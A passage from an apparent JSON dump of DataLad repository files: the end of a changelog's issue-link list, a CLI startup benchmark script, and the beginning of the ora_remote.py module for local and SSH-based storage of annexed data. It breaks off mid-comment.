https://github.com/datalad/datalad/issues/4036\n[#4037]: https://github.com/datalad/datalad/issues/4037\n[#4041]: https://github.com/datalad/datalad/issues/4041\n[#4045]: https://github.com/datalad/datalad/issues/4045\n[#4046]: https://github.com/datalad/datalad/issues/4046\n[#4049]: https://github.com/datalad/datalad/issues/4049\n[#4050]: https://github.com/datalad/datalad/issues/4050\n[#4057]: https://github.com/datalad/datalad/issues/4057\n[#4060]: https://github.com/datalad/datalad/issues/4060\n[#4064]: https://github.com/datalad/datalad/issues/4064\n[#4065]: https://github.com/datalad/datalad/issues/4065\n[#4070]: https://github.com/datalad/datalad/issues/4070\n[#4073]: https://github.com/datalad/datalad/issues/4073\n[#4078]: https://github.com/datalad/datalad/issues/4078\n[#4080]: https://github.com/datalad/datalad/issues/4080\n[#4081]: https://github.com/datalad/datalad/issues/4081\n[#4087]: https://github.com/datalad/datalad/issues/4087\n[#4091]: https://github.com/datalad/datalad/issues/4091\n[#4099]: https://github.com/datalad/datalad/issues/4099\n[#4106]: https://github.com/datalad/datalad/issues/4106\n[#4124]: https://github.com/datalad/datalad/issues/4124\n[#4140]: https://github.com/datalad/datalad/issues/4140\n[#4147]: https://github.com/datalad/datalad/issues/4147\n[#4156]: https://github.com/datalad/datalad/issues/4156\n[#4157]: https://github.com/datalad/datalad/issues/4157\n[#4158]: https://github.com/datalad/datalad/issues/4158\n[#4159]: https://github.com/datalad/datalad/issues/4159\n[#4167]: https://github.com/datalad/datalad/issues/4167\n[#4168]: https://github.com/datalad/datalad/issues/4168\n[#4169]: https://github.com/datalad/datalad/issues/4169\n[#4170]: https://github.com/datalad/datalad/issues/4170\n[#4171]: https://github.com/datalad/datalad/issues/4171\n[#4172]: https://github.com/datalad/datalad/issues/4172\n[#4174]: https://github.com/datalad/datalad/issues/4174\n[#4175]: https://github.com/datalad/datalad/issues/4175\n[#4187]: https://github.com/datalad/datalad/issues/4187\n[#4194]: https://github.com/datalad/datalad/issues/4194\n[#4196]: https://github.com/datalad/datalad/issues/4196\n[#4200]: https://github.com/datalad/datalad/issues/4200\n[#4203]: https://github.com/datalad/datalad/issues/4203\n[#4206]: https://github.com/datalad/datalad/issues/4206\n[#4212]: https://github.com/datalad/datalad/issues/4212\n[#4214]: https://github.com/datalad/datalad/issues/4214\n[#4235]: https://github.com/datalad/datalad/issues/4235\n[#4239]: https://github.com/datalad/datalad/issues/4239\n[#4243]: https://github.com/datalad/datalad/issues/4243\n[#4245]: https://github.com/datalad/datalad/issues/4245\n[#4257]: https://github.com/datalad/datalad/issues/4257\n[#4260]: https://github.com/datalad/datalad/issues/4260\n[#4262]: https://github.com/datalad/datalad/issues/4262\n[#4268]: https://github.com/datalad/datalad/issues/4268\n[#4273]: https://github.com/datalad/datalad/issues/4273\n[#4274]: https://github.com/datalad/datalad/issues/4274\n[#4276]: https://github.com/datalad/datalad/issues/4276\n[#4285]: https://github.com/datalad/datalad/issues/4285\n[#4290]: https://github.com/datalad/datalad/issues/4290\n[#4291]: https://github.com/datalad/datalad/issues/4291\n[#4292]: https://github.com/datalad/datalad/issues/4292\n[#4296]: https://github.com/datalad/datalad/issues/4296\n[#4301]: https://github.com/datalad/datalad/issues/4301\n[#4303]: https://github.com/datalad/datalad/issues/4303\n[#4304]: https://github.com/datalad/datalad/issues/4304\n[#4305]: https://github.com/datalad/datalad/issues/4305\n[#4306]: https://github.com/datalad/datalad/issues/4306\n[#4308]: https://github.com/datalad/datalad/issues/4308\n[#4314]: https://github.com/datalad/datalad/issues/4314\n[#4315]: https://github.com/datalad/datalad/issues/4315\n[#4316]: https://github.com/datalad/datalad/issues/4316\n[#4317]: https://github.com/datalad/datalad/issues/4317\n[#4319]: https://github.com/datalad/datalad/issues/4319\n[#4321]: https://github.com/datalad/datalad/issues/4321\n[#4323]: https://github.com/datalad/datalad/issues/4323\n[#4324]: https://github.com/datalad/datalad/issues/4324\n[#4326]: https://github.com/datalad/datalad/issues/4326\n[#4328]: https://github.com/datalad/datalad/issues/4328\n[#4330]: https://github.com/datalad/datalad/issues/4330\n[#4331]: https://github.com/datalad/datalad/issues/4331\n[#4332]: https://github.com/datalad/datalad/issues/4332\n[#4337]: https://github.com/datalad/datalad/issues/4337\n[#4338]: https://github.com/datalad/datalad/issues/4338\n[#4342]: https://github.com/datalad/datalad/issues/4342\n[#4348]: https://github.com/datalad/datalad/issues/4348\n[#4354]: https://github.com/datalad/datalad/issues/4354\n[#4361]: https://github.com/datalad/datalad/issues/4361\n[#4367]: https://github.com/datalad/datalad/issues/4367\n[#4370]: https://github.com/datalad/datalad/issues/4370\n[#4375]: https://github.com/datalad/datalad/issues/4375\n[#4382]: https://github.com/datalad/datalad/issues/4382\n[#4398]: https://github.com/datalad/datalad/issues/4398\n[#4400]: https://github.com/datalad/datalad/issues/4400\n[#4409]: https://github.com/datalad/datalad/issues/4409\n[#4420]: https://github.com/datalad/datalad/issues/4420\n[#4421]: https://github.com/datalad/datalad/issues/4421\n[#4426]: https://github.com/datalad/datalad/issues/4426\n[#4430]: https://github.com/datalad/datalad/issues/4430\n[#4431]: https://github.com/datalad/datalad/issues/4431\n[#4435]: https://github.com/datalad/datalad/issues/4435\n[#4438]: https://github.com/datalad/datalad/issues/4438\n[#4439]: https://github.com/datalad/datalad/issues/4439\n[#4441]: https://github.com/datalad/datalad/issues/4441\n[#4448]: https://github.com/datalad/datalad/issues/4448\n[#4456]: https://github.com/datalad/datalad/issues/4456\n[#4459]: https://github.com/datalad/datalad/issues/4459\n[#4460]: https://github.com/datalad/datalad/issues/4460\n[#4463]: https://github.com/datalad/datalad/issues/4463\n[#4464]: https://github.com/datalad/datalad/issues/4464\n[#4471]: https://github.com/datalad/datalad/issues/4471\n[#4477]: https://github.com/datalad/datalad/issues/4477\n[#4480]: https://github.com/datalad/datalad/issues/4480\n[#4481]: https://github.com/datalad/datalad/issues/4481\n[#4504]: https://github.com/datalad/datalad/issues/4504\n[#4526]: https://github.com/datalad/datalad/issues/4526\n[#4529]: https://github.com/datalad/datalad/issues/4529\n[#4543]: https://github.com/datalad/datalad/issues/4543\n[#4544]: https://github.com/datalad/datalad/issues/4544\n[#4549]: https://github.com/datalad/datalad/issues/4549\n[#4552]: https://github.com/datalad/datalad/issues/4552\n[#4553]: https://github.com/datalad/datalad/issues/4553\n[#4560]: https://github.com/datalad/datalad/issues/4560\n[#4568]: https://github.com/datalad/datalad/issues/4568\n[#4581]: https://github.com/datalad/datalad/issues/4581\n[#4583]: https://github.com/datalad/datalad/issues/4583\n[#4597]: https://github.com/datalad/datalad/issues/4597\n[#4617]: https://github.com/datalad/datalad/issues/4617\n[#4619]: https://github.com/datalad/datalad/issues/4619\n[#4620]: https://github.com/datalad/datalad/issues/4620\n[#4650]: https://github.com/datalad/datalad/issues/4650\n[#4657]: https://github.com/datalad/datalad/issues/4657\n[#4666]: https://github.com/datalad/datalad/issues/4666\n[#4669]: https://github.com/datalad/datalad/issues/4669\n[#4673]: https://github.com/datalad/datalad/issues/4673\n[#4674]: https://github.com/datalad/datalad/issues/4674\n[#4675]: https://github.com/datalad/datalad/issues/4675\n[#4682]: https://github.com/datalad/datalad/issues/4682\n[#4683]: https://github.com/datalad/datalad/issues/4683\n[#4684]: https://github.com/datalad/datalad/issues/4684\n[#4687]: https://github.com/datalad/datalad/issues/4687\n[#4692]: https://github.com/datalad/datalad/issues/4692\n[#4695]: https://github.com/datalad/datalad/issues/4695\n[#4696]: https://github.com/datalad/datalad/issues/4696\n[#4699]: https://github.com/datalad/datalad/issues/4699\n[#4703]: https://github.com/datalad/datalad/issues/4703\n[#4729]: https://github.com/datalad/datalad/issues/4729\n[#4736]: https://github.com/datalad/datalad/issues/4736\n[#4745]: https://github.com/datalad/datalad/issues/4745\n[#4746]: https://github.com/datalad/datalad/issues/4746\n[#4749]: https://github.com/datalad/datalad/issues/4749\n[#4757]: https://github.com/datalad/datalad/issues/4757\n[#4759]: https://github.com/datalad/datalad/issues/4759\n[#4760]: https://github.com/datalad/datalad/issues/4760\n[#4763]: https://github.com/datalad/datalad/issues/4763\n[#4764]: https://github.com/datalad/datalad/issues/4764\n[#4769]: https://github.com/datalad/datalad/issues/4769\n[#4775]: https://github.com/datalad/datalad/issues/4775\n[#4786]: https://github.com/datalad/datalad/issues/4786\n[#4788]: https://github.com/datalad/datalad/issues/4788\n[#4790]: https://github.com/datalad/datalad/issues/4790\n[#4792]: https://github.com/datalad/datalad/issues/4792\n[#4793]: https://github.com/datalad/datalad/issues/4793\n[#4806]: https://github.com/datalad/datalad/issues/4806\n[#4807]: https://github.com/datalad/datalad/issues/4807\n[#4816]: https://github.com/datalad/datalad/issues/4816\n[#4817]: https://github.com/datalad/datalad/issues/4817\n[#4821]: https://github.com/datalad/datalad/issues/4821\n[#4824]: https://github.com/datalad/datalad/issues/4824\n[#4828]: https://github.com/datalad/datalad/issues/4828\n[#4829]: https://github.com/datalad/datalad/issues/4829\n[#4834]: https://github.com/datalad/datalad/issues/4834\n[#4835]: https://github.com/datalad/datalad/issues/4835\n[#4845]: https://github.com/datalad/datalad/issues/4845\n[#4853]: https://github.com/datalad/datalad/issues/4853\n[#4855]: https://github.com/datalad/datalad/issues/4855\n[#4866]: https://github.com/datalad/datalad/issues/4866\n[#4867]: https://github.com/datalad/datalad/issues/4867\n[#4868]: https://github.com/datalad/datalad/issues/4868\n[#4877]: https://github.com/datalad/datalad/issues/4877\n[#4879]: https://github.com/datalad/datalad/issues/4879\n[#4896]: https://github.com/datalad/datalad/issues/4896\n[#4899]: https://github.com/datalad/datalad/issues/4899\n[#4900]: https://github.com/datalad/datalad/issues/4900\n[#4904]: https://github.com/datalad/datalad/issues/4904\n[#4908]: https://github.com/datalad/datalad/issues/4908\n[#4911]: https://github.com/datalad/datalad/issues/4911\n[#4924]: https://github.com/datalad/datalad/issues/4924\n[#4926]: https://github.com/datalad/datalad/issues/4926\n[#4927]: https://github.com/datalad/datalad/issues/4927\n[#4931]: https://github.com/datalad/datalad/issues/4931\n[#4952]: https://github.com/datalad/datalad/issues/4952\n[#4953]: https://github.com/datalad/datalad/issues/4953\n[#4955]: https://github.com/datalad/datalad/issues/4955\n[#4957]: https://github.com/datalad/datalad/issues/4957\n[#4963]: https://github.com/datalad/datalad/issues/4963\n[#4966]: https://github.com/datalad/datalad/issues/4966\n[#4977]: https://github.com/datalad/datalad/issues/4977\n[#4982]: https://github.com/datalad/datalad/issues/4982\n[#4985]: https://github.com/datalad/datalad/issues/4985\n[#4991]: https://github.com/datalad/datalad/issues/4991\n[#4996]: https://github.com/datalad/datalad/issues/4996\n[#5001]: https://github.com/datalad/datalad/issues/5001\n[#5002]: https://github.com/datalad/datalad/issues/5002\n[#5008]: https://github.com/datalad/datalad/issues/5008\n[#5010]: https://github.com/datalad/datalad/issues/5010\n[#5017]: https://github.com/datalad/datalad/issues/5017\n[#5022]: https://github.com/datalad/datalad/issues/5022\n[#5025]: https://github.com/datalad/datalad/issues/5025\n[#5026]: https://github.com/datalad/datalad/issues/5026\n[#5035]: https://github.com/datalad/datalad/issues/5035\n[#5042]: https://github.com/datalad/datalad/issues/5042\n[#5045]: https://github.com/datalad/datalad/issues/5045\n[#5049]: https://github.com/datalad/datalad/issues/5049\n[#5051]: https://github.com/datalad/datalad/issues/5051\n[#5057]: https://github.com/datalad/datalad/issues/5057\n[#5060]: https://github.com/datalad/datalad/issues/5060\n[#5067]: https://github.com/datalad/datalad/issues/5067\n[#5070]: https://github.com/datalad/datalad/issues/5070\n[#5076]: https://github.com/datalad/datalad/issues/5076\n[#5081]: https://github.com/datalad/datalad/issues/5081\n[#5090]: https://github.com/datalad/datalad/issues/5090\n[#5091]: https://github.com/datalad/datalad/issues/5091\n[#5106]: https://github.com/datalad/datalad/issues/5106\n[#5108]: https://github.com/datalad/datalad/issues/5108\n[#5113]: https://github.com/datalad/datalad/issues/5113\n[#5119]: https://github.com/datalad/datalad/issues/5119\n[#5121]: https://github.com/datalad/datalad/issues/5121\n[#5125]: https://github.com/datalad/datalad/issues/5125\n[#5127]: https://github.com/datalad/datalad/issues/5127\n[#5128]: https://github.com/datalad/datalad/issues/5128\n[#5129]: https://github.com/datalad/datalad/issues/5129\n[#5136]: https://github.com/datalad/datalad/issues/5136\n[#5141]: https://github.com/datalad/datalad/issues/5141\n[#5142]: https://github.com/datalad/datalad/issues/5142\n[#5146]: https://github.com/datalad/datalad/issues/5146\n[#5148]: https://github.com/datalad/datalad/issues/5148\n[#5151]: https://github.com/datalad/datalad/issues/5151\n[#5156]: https://github.com/datalad/datalad/issues/5156\n[#5163]: https://github.com/datalad/datalad/issues/5163\n[#5184]: https://github.com/datalad/datalad/issues/5184\n[#5194]: https://github.com/datalad/datalad/issues/5194\n[#5200]: https://github.com/datalad/datalad/issues/5200\n[#5201]: https://github.com/datalad/datalad/issues/5201\n[#5214]: https://github.com/datalad/datalad/issues/5214\n[#5218]: https://github.com/datalad/datalad/issues/5218\n[#5219]: https://github.com/datalad/datalad/issues/5219\n[#5229]: https://github.com/datalad/datalad/issues/5229\n[#5238]: https://github.com/datalad/datalad/issues/5238\n[#5241]: https://github.com/datalad/datalad/issues/5241\n[#5254]: https://github.com/datalad/datalad/issues/5254\n[#5255]: https://github.com/datalad/datalad/issues/5255\n[#5258]: https://github.com/datalad/datalad/issues/5258\n[#5259]: https://github.com/datalad/datalad/issues/5259\n[#5269]: https://github.com/datalad/datalad/issues/5269\n[#5276]: https://github.com/datalad/datalad/issues/5276\n[#5278]: https://github.com/datalad/datalad/issues/5278\n[#5285]: https://github.com/datalad/datalad/issues/5285\n[#5290]: https://github.com/datalad/datalad/issues/5290\n[#5328]: https://github.com/datalad/datalad/issues/5328\n[#5332]: https://github.com/datalad/datalad/issues/5332\n[#5342]: https://github.com/datalad/datalad/issues/5342\n[#5344]: https://github.com/datalad/datalad/issues/5344\n[#5346]: https://github.com/datalad/datalad/issues/5346\n[#5350]: https://github.com/datalad/datalad/issues/5350\n[#5367]: https://github.com/datalad/datalad/issues/5367\n[#5389]: https://github.com/datalad/datalad/issues/5389\n[#5391]: https://github.com/datalad/datalad/issues/5391\n[#5415]: https://github.com/datalad/datalad/issues/5415\n[#5416]: https://github.com/datalad/datalad/issues/5416\n[#5421]: https://github.com/datalad/datalad/issues/5421\n[#5425]: https://github.com/datalad/datalad/issues/5425\n[#5430]: https://github.com/datalad/datalad/issues/5430\n[#5431]: https://github.com/datalad/datalad/issues/5431\n[#5436]: https://github.com/datalad/datalad/issues/5436\n[#5438]: https://github.com/datalad/datalad/issues/5438\n[#5441]: https://github.com/datalad/datalad/issues/5441\n[#5453]: https://github.com/datalad/datalad/issues/5453\n[#5458]: https://github.com/datalad/datalad/issues/5458\n[#5461]: https://github.com/datalad/datalad/issues/5461\n[#5466]: https://github.com/datalad/datalad/issues/5466\n[#5474]: https://github.com/datalad/datalad/issues/5474\n[#5476]: https://github.com/datalad/datalad/issues/5476\n[#5480]: https://github.com/datalad/datalad/issues/5480\n[#5488]: https://github.com/datalad/datalad/issues/5488\n[#5492]: https://github.com/datalad/datalad/issues/5492\n[#5505]: https://github.com/datalad/datalad/issues/5505\n[#5509]: https://github.com/datalad/datalad/issues/5509\n[#5512]: https://github.com/datalad/datalad/issues/5512\n[#5525]: https://github.com/datalad/datalad/issues/5525\n[#5531]: https://github.com/datalad/datalad/issues/5531\n[#5533]: https://github.com/datalad/datalad/issues/5533\n[#5534]: https://github.com/datalad/datalad/issues/5534\n[#5536]: https://github.com/datalad/datalad/issues/5536\n[#5539]: https://github.com/datalad/datalad/issues/5539\n[#5543]: https://github.com/datalad/datalad/issues/5543\n[#5544]: https://github.com/datalad/datalad/issues/5544\n[#5550]: https://github.com/datalad/datalad/issues/5550\n[#5551]: https://github.com/datalad/datalad/issues/5551\n[#5552]: https://github.com/datalad/datalad/issues/5552\n[#5555]: https://github.com/datalad/datalad/issues/5555\n[#5558]: https://github.com/datalad/datalad/issues/5558\n[#5559]: https://github.com/datalad/datalad/issues/5559\n[#5560]: https://github.com/datalad/datalad/issues/5560\n[#5569]: https://github.com/datalad/datalad/issues/5569\n[#5572]: https://github.com/datalad/datalad/issues/5572\n[#5577]: https://github.com/datalad/datalad/issues/5577\n[#5580]: https://github.com/datalad/datalad/issues/5580\n[#5592]: https://github.com/datalad/datalad/issues/5592\n[#5594]: https://github.com/datalad/datalad/issues/5594\n[#5603]: https://github.com/datalad/datalad/issues/5603\n[#5607]: https://github.com/datalad/datalad/issues/5607\n[#5609]: https://github.com/datalad/datalad/issues/5609\n[#5612]: https://github.com/datalad/datalad/issues/5612\n[#5630]: https://github.com/datalad/datalad/issues/5630\n[#5632]: https://github.com/datalad/datalad/issues/5632\n[#5639]: https://github.com/datalad/datalad/issues/5639\n[#5655]: https://github.com/datalad/datalad/issues/5655\n[#5667]: https://github.com/datalad/datalad/issues/5667\n[#5675]: https://github.com/datalad/datalad/issues/5675\n[#5680]: https://github.com/datalad/datalad/issues/5680\n[#5681]: https://github.com/datalad/datalad/issues/5681\n[#5682]: https://github.com/datalad/datalad/issues/5682\n[#5683]: https://github.com/datalad/datalad/issues/5683\n[#5689]: https://github.com/datalad/datalad/issues/5689\n[#5692]: https://github.com/datalad/datalad/issues/5692\n[#5693]: https://github.com/datalad/datalad/issues/5693\n[#5696]: https://github.com/datalad/datalad/issues/5696\n[#5698]: https://github.com/datalad/datalad/issues/5698\n[#5708]: https://github.com/datalad/datalad/issues/5708\n[#5726]: https://github.com/datalad/datalad/issues/5726\n[#5738]: https://github.com/datalad/datalad/issues/5738\n[#5740]: https://github.com/datalad/datalad/issues/5740\n[#5749]: https://github.com/datalad/datalad/issues/5749\n[#5760]: https://github.com/datalad/datalad/issues/5760\n[#5777]: https://github.com/datalad/datalad/issues/5777\n[#5789]: https://github.com/datalad/datalad/issues/5789\n[#5792]: https://github.com/datalad/datalad/issues/5792\n[#5803]: https://github.com/datalad/datalad/issues/5803\n[#5804]: https://github.com/datalad/datalad/issues/5804\n[#5805]: https://github.com/datalad/datalad/issues/5805\n[#5823]: https://github.com/datalad/datalad/issues/5823\n[#5837]: https://github.com/datalad/datalad/issues/5837\n[#5847]: https://github.com/datalad/datalad/issues/5847\n[#5884]: https://github.com/datalad/datalad/issues/5884\n[#5892]: https://github.com/datalad/datalad/issues/5892\n[#5902]: https://github.com/datalad/datalad/issues/5902\n[#5904]: https://github.com/datalad/datalad/issues/5904\n[#5907]: https://github.com/datalad/datalad/issues/5907\n[#5913]: https://github.com/datalad/datalad/issues/5913\n[#5915]: https://github.com/datalad/datalad/issues/5915\n[#5956]: https://github.com/datalad/datalad/issues/5956\n" }, { "alpha_fraction": 0.5520548224449158, "alphanum_fraction": 0.5541095733642578, "avg_line_length": 29.41666603088379, "blob_id": "8aeb405de4f16f3abe66681ba4d67460eba1e90a", "content_id": "d06833c8075c4372e1e98ee794d2c5b998c6186d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1460, "license_type": "permissive", "max_line_length": 79, "num_lines": 48, "path": "/benchmarks/cli.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks for DataLad CLI\"\"\"\n\nimport os\nimport sys\nimport os.path as osp\n\nfrom subprocess import call\nfrom .common import SuprocBenchmarks\n\n\nclass startup(SuprocBenchmarks):\n \"\"\"\n Benchmarks for datalad command startup\n \"\"\"\n\n def setup(self):\n # we need to prepare/adjust PATH to point to installed datalad\n # We will base it on taking sys.executable\n python_path = osp.dirname(sys.executable)\n self.env = os.environ.copy()\n self.env['PATH'] = '%s:%s' % (python_path, self.env.get('PATH', ''))\n\n def time_usage_advice(self):\n call([\"datalad\"], env=self.env)\n\n def time_short_help(self):\n call([\"datalad\", \"-h\"], env=self.env)\n\n def time_help_np(self):\n call([\"datalad\", \"--help-np\"], env=self.env)\n\n def time_command_short_help(self):\n call([\"datalad\", \"wtf\", \"-h\"], env=self.env)\n\n def time_command_help_np(self):\n call([\"datalad\", \"wtf\", \"--help-np\"], env=self.env)\n\n def time_command_execution(self):\n # pick a command that should be minimally impacted by\n # non-CLI factors\n call([\"datalad\", \"wtf\", \"-S\", \"python\"], env=self.env)\n" }, { "alpha_fraction": 0.5538864731788635, "alphanum_fraction": 0.5561690330505371, "avg_line_length": 38.08378601074219, "blob_id": "483d3e3d3024ec636662a501b7f72ce2a81b3f91", "content_id": "682580ab3bc165b6e97f3ace913c39be736c79ab", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64840, "license_type": "permissive", "max_line_length": 93, "num_lines": 1659, "path": "/datalad/distributed/ora_remote.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import functools\nimport os\nimport stat\nimport sys\nfrom pathlib import (\n Path,\n PurePosixPath\n)\nfrom contextlib import contextmanager\nimport requests\nimport shutil\nfrom shlex import quote as sh_quote\nimport subprocess\nimport logging\nfrom functools import wraps\n\nfrom datalad import ssh_manager\nfrom datalad.config import anything2bool\nfrom datalad.customremotes import (\n ProtocolError,\n RemoteError,\n SpecialRemote,\n)\nfrom datalad.customremotes.main import main as super_main\nfrom datalad.support.annex_utils import _sanitize_key\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n AccessDeniedError,\n AccessFailedError,\n CapturedException,\n DownloadError\n)\nfrom datalad.support.network import url_path2local_path\nfrom datalad.customremotes.ria_utils import (\n get_layout_locations,\n UnknownLayoutVersion,\n verify_ria_url,\n)\nfrom datalad.utils import (\n ensure_write_permission,\n on_osx\n)\n\n\nlgr = logging.getLogger('datalad.customremotes.ria_remote')\n\nDEFAULT_BUFFER_SIZE = 65536\n\n# TODO\n# - make archive check optional\n\n\n# only use by _get_datalad_id\ndef _get_gitcfg(gitdir, key, cfgargs=None, regex=False):\n cmd = [\n 'git',\n '--git-dir', gitdir,\n 'config',\n ]\n if cfgargs:\n cmd += cfgargs\n\n cmd += ['--get-regexp'] if regex else ['--get']\n cmd += [key]\n try:\n return subprocess.check_output(\n cmd,\n # yield text\n universal_newlines=True).strip()\n except Exception:\n lgr.debug(\n \"Failed to obtain config '%s' at %s\",\n key, gitdir,\n )\n return None\n\n\n# cannot be replaced until https://github.com/datalad/datalad/issues/6264\n# is fixed\ndef _get_datalad_id(gitdir):\n \"\"\"Attempt to determine a DataLad dataset ID for a given repo\n\n Returns\n -------\n str or None\n None in case no ID was found\n \"\"\"\n dsid = _get_gitcfg(\n gitdir, 'datalad.dataset.id', ['--blob', ':.datalad/config']\n )\n if dsid is None:\n lgr.debug(\n \"Cannot determine a DataLad ID for repository: %s\",\n gitdir,\n )\n else:\n dsid = dsid.strip()\n return dsid\n\n\nclass RemoteCommandFailedError(Exception):\n pass\n\n\nclass RIARemoteError(RemoteError):\n pass\n\n\nclass IOBase(object):\n \"\"\"Abstract class with the desired API for local/remote operations\"\"\"\n\n def get_7z(self):\n raise NotImplementedError\n\n def mkdir(self, path):\n raise NotImplementedError\n\n def symlink(self, target, link_name):\n raise NotImplementedError\n\n def put(self, src, dst, progress_cb):\n raise NotImplementedError\n\n def get(self, src, dst, progress_cb):\n raise NotImplementedError\n\n def rename(self, src, dst):\n raise NotImplementedError\n\n def remove(self, path):\n raise NotImplementedError\n\n def exists(self, path):\n raise NotImplementedError\n\n def get_from_archive(self, archive, src, dst, progress_cb):\n \"\"\"Get a file from an archive\n\n Parameters\n ----------\n archive_path : Path or str\n Must be an absolute path and point to an existing supported archive\n file_path : Path or str\n Must be a relative Path (relative to the root\n of the archive)\n \"\"\"\n raise NotImplementedError\n\n def in_archive(self, archive_path, file_path):\n \"\"\"Test whether a file is in an archive\n\n Parameters\n ----------\n archive_path : Path or str\n Must be an absolute path and point to an existing supported archive\n file_path : Path or str\n Must be a relative Path (relative to the root\n of the archive)\n \"\"\"\n raise NotImplementedError\n\n def read_file(self, file_path):\n \"\"\"Read a remote file's content\n\n Parameters\n ----------\n file_path : Path or str\n Must be an absolute path\n\n Returns\n -------\n string\n \"\"\"\n\n raise NotImplementedError\n\n def write_file(self, file_path, content, mode='w'):\n \"\"\"Write a remote file\n\n Parameters\n ----------\n file_path : Path or str\n Must be an absolute path\n content : str\n \"\"\"\n\n raise NotImplementedError\n\n\nclass LocalIO(IOBase):\n \"\"\"IO operation if the object tree is local (e.g. NFS-mounted)\"\"\"\n\n ensure_writeable = staticmethod(ensure_write_permission)\n\n def mkdir(self, path):\n path.mkdir(\n parents=True,\n exist_ok=True,\n )\n\n def symlink(self, target, link_name):\n os.symlink(target, link_name)\n\n def put(self, src, dst, progress_cb):\n shutil.copy(\n str(src),\n str(dst),\n )\n\n def get(self, src, dst, progress_cb):\n shutil.copy(\n str(src),\n str(dst),\n )\n\n def get_from_archive(self, archive, src, dst, progress_cb):\n # Upfront check to avoid cryptic error output\n # https://github.com/datalad/datalad/issues/4336\n if not self.exists(archive):\n raise RIARemoteError(\"archive {arc} does not exist.\"\n \"\".format(arc=archive))\n\n # this requires python 3.5\n with open(dst, 'wb') as target_file:\n subprocess.run([\n '7z', 'x', '-so',\n str(archive), str(src)],\n stdout=target_file,\n )\n # Note for progress reporting:\n # man 7z:\n #\n # -bs{o|e|p}{0|1|2}\n # Set output stream for output/error/progress line\n\n def rename(self, src, dst):\n with self.ensure_writeable(dst.parent):\n src.rename(dst)\n\n def remove(self, path):\n try:\n with self.ensure_writeable(path.parent):\n path.unlink()\n except PermissionError as e:\n raise RIARemoteError(f\"Unable to remove {path}. Could not \"\n \"obtain write permission for containing\"\n \"directory.\") from e\n\n def remove_dir(self, path):\n with self.ensure_writeable(path.parent):\n path.rmdir()\n\n def exists(self, path):\n return path.exists()\n\n def in_archive(self, archive_path, file_path):\n if not archive_path.exists():\n # no archive, not file\n return False\n loc = str(file_path)\n from datalad.cmd import (\n StdOutErrCapture,\n WitlessRunner,\n )\n runner = WitlessRunner()\n # query 7z for the specific object location, keeps the output\n # lean, even for big archives\n out = runner.run(\n ['7z', 'l', str(archive_path),\n loc],\n protocol=StdOutErrCapture,\n )\n return loc in out['stdout']\n\n def read_file(self, file_path):\n\n with open(str(file_path), 'r') as f:\n content = f.read()\n return content\n\n def write_file(self, file_path, content, mode='w'):\n if not content.endswith('\\n'):\n content += '\\n'\n with open(str(file_path), mode) as f:\n f.write(content)\n\n def get_7z(self):\n from datalad.cmd import CommandError, StdOutErrCapture, WitlessRunner\n # from datalad.utils import on_windows\n\n runner = WitlessRunner()\n # TODO: To not rely on availability in PATH we might want to use `which`\n # (`where` on windows) and get the actual path to 7z to re-use in\n # in_archive() and get().\n # Note: `command -v XXX` or `type` might be cross-platform\n # solution!\n # However, for availability probing only, it would be sufficient\n # to just call 7z and see whether it returns zero.\n\n # cmd = 'where' if on_windows else 'which'\n # try:\n # out = runner.run([cmd, '7z'], protocol=StdOutErrCapture)\n # return out['stdout']\n # except CommandError:\n # return None\n\n try:\n runner.run('7z', protocol=StdOutErrCapture)\n return True\n except (FileNotFoundError, CommandError):\n return False\n\n\nclass SSHRemoteIO(IOBase):\n \"\"\"IO operation if the object tree is SSH-accessible\n\n It doesn't even think about a windows server.\n \"\"\"\n\n # output markers to detect possible command failure as well as end of output\n # from a particular command:\n REMOTE_CMD_FAIL = \"ora-remote: end - fail\"\n REMOTE_CMD_OK = \"ora-remote: end - ok\"\n\n def __init__(self, host, buffer_size=DEFAULT_BUFFER_SIZE):\n \"\"\"\n Parameters\n ----------\n host : str\n SSH-accessible host(name) to perform remote IO operations\n on.\n \"\"\"\n\n # the connection to the remote\n # we don't open it yet, not yet clear if needed\n self.ssh = ssh_manager.get_connection(\n host,\n use_remote_annex_bundle=False,\n )\n self.ssh.open()\n # open a remote shell\n cmd = ['ssh'] + self.ssh._ssh_args + [self.ssh.sshri.as_str()]\n self.shell = subprocess.Popen(cmd,\n stderr=subprocess.DEVNULL,\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE)\n # swallow login message(s):\n self.shell.stdin.write(b\"echo RIA-REMOTE-LOGIN-END\\n\")\n self.shell.stdin.flush()\n while True:\n line = self.shell.stdout.readline()\n if line == b\"RIA-REMOTE-LOGIN-END\\n\":\n break\n # TODO: Same for stderr?\n\n # make sure default is used when None was passed, too.\n self.buffer_size = buffer_size if buffer_size else DEFAULT_BUFFER_SIZE\n\n def close(self):\n # try exiting shell clean first\n self.shell.stdin.write(b\"exit\\n\")\n self.shell.stdin.flush()\n exitcode = self.shell.wait(timeout=0.5)\n # be more brutal if it doesn't work\n if exitcode is None: # timed out\n # TODO: Theoretically terminate() can raise if not successful.\n # How to deal with that?\n self.shell.terminate()\n\n def _append_end_markers(self, cmd):\n \"\"\"Append end markers to remote command\"\"\"\n\n return cmd + \" && printf '%s\\\\n' {} || printf '%s\\\\n' {}\\n\".format(\n sh_quote(self.REMOTE_CMD_OK),\n sh_quote(self.REMOTE_CMD_FAIL))\n\n def _get_download_size_from_key(self, key):\n \"\"\"Get the size of an annex object file from it's key\n\n Note, that this is not necessarily the size of the annexed file, but\n possibly only a chunk of it.\n\n Parameter\n ---------\n key: str\n annex key of the file\n\n Returns\n -------\n int\n size in bytes\n \"\"\"\n # TODO: datalad's AnnexRepo.get_size_from_key() is not correct/not\n # fitting. Incorporate the wisdom there, too.\n # We prob. don't want to actually move this method there, since\n # AnnexRepo would be quite an expensive import. Startup time for\n # special remote matters.\n # TODO: this method can be more compact. we don't need particularly\n # 